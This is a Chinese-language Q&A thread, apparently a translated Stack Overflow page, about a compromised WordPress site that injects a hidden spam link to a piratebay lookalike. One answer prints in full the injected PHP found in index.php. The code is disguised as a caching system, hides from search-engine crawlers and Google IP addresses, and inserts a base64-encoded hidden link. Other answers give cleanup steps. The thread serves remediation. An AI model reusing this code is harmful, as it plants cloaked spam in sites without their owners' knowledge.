1

在 wordpress 网站上,通过某种攻击插入了格式错误的 div 标签和指向 thepiratebay.in.ua 的链接。

插入的代码是:

div style="position:absolute;top:-1488px;"&gt;<a href="http://thepiratebay.in.ua">torrents,pirate,piratebay,software torrents,porn,porn download</a>

在该站点的克隆上,我已从当前主题切换到默认主题,并且还禁用了所有活动插件,但问题仍然存在。

grep 'porn' 或 'piratebay' 的所有站点文件一无所获,搜索数据库也是如此。插入发生在页脚完成后,在<body>标签底部加载脚本的中间。

该攻击似乎还允许东欧垃圾邮件发送者发送邮件,如下所示:

Tylko spojrzcie jak ten dran zarabia!

有人见过这个吗?或者对下一步的补救措施有什么建议?

谢谢

4

3 回答 3

2

我遇到了完全相同的问题,刚刚解决了。检查你 index.php

我的几天前被修改过,与其他 wordpress 安装相比,我看到它在开始时有这些额外的行:

//eAccelerate Caching System
/*ordpr*/
@ini_set('display_errors', '0');
ob_start('__e_accelerate_engine');
register_shutdown_function('ob_end_flush');

function __e_accelerate_engine($output) {if ((substr(trim($_SERVER['REMOTE_ADDR']),0,6)!=='74.125') && !preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])){
$data=serialize(array('page'=>md5($_SERVER['REQUEST_URI']), 'host'=>$_SERVER['HTTP_HOST'],'ip'=>$_SERVER['REMOTE_ADDR'],'ua'=>$_SERVER["HTTP_USER_AGENT"],'kdg'=>20));$tags=array('</body>');shuffle($tags);foreach($tags as $tg){if(preg_match('!'.$tg.'!', $output)) {$output=preg_replace('!'.$tg.'!', base64_decode('PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOi0xNDg4cHg7Ij48YSBocmVmPSJodHRwOi8vdGhlcGlyYXRlYmF5LmluLnVhIj5waXJhdGViYXkscGlyYXRlIGJheSxwaXJhdGUsYmF5LHRvcnJlbnRzLGZyZWUsZnJlZSBzb2Z0d2FyZSxzb2Z0d2FyZSx0b3JyZW50cyxmcmVlIHRvcnJlbnRzLGZyZWUgcG9ybixwb3JuIHRvcnJlbnRzLHRvcnJlbnQ8L2E+PC9kaXY+').$tg, $output, 1);break;}}}return ((isset($_GET['fccheck']))?('<!--check:'.md5($_GET['fccheck']).'-->'):('')).$output;}

要检查我运行的最后修改的文件:

 find *.php -mtime -96

(96 是 4 天)我刚刚删除了线条,div 不见了!

我希望它也能为你解决。

编辑:顺便说一句,前几天我遇到了很大的邮件问题,我受到了反向散射的攻击,每小时发送数百个错误的退回邮件,我的 Ip 在MxToolBox的 15 个黑名单中。我不知道这是否是原因,但幸运的是它现在已经解决了。所以如果我是你,我会在那里或类似的页面中检查你的 IP。

于 2015-02-19T19:45:26.233 回答
1

首先,检查整个 WP 安装,看看哪些文件是最新更新的。那将是您开始寻找的地方。通常代码是加密的,这就是为什么使用 grep 找不到它的原因。寻找类似的东西:

eval(gzinflate(base64_decode(..)));

尝试对“eval”或“base64_decode”进行 grep'ing。

此代码通常被插入到 functions.php 文件或主题的页脚中。您可以通过激活另一个主题来测试它。另外,尝试禁用所有插件,看看是否最终会删除代码。

这是解决和预防的方便指南:

http://codex.wordpress.org/FAQ_My_site_was_hacked

于 2015-02-19T04:01:46.313 回答
0

谷歌每个插件名称后跟漏洞。我有一个类似的问题,攻击者通过插件进入。

于 2015-02-19T05:38:33.037 回答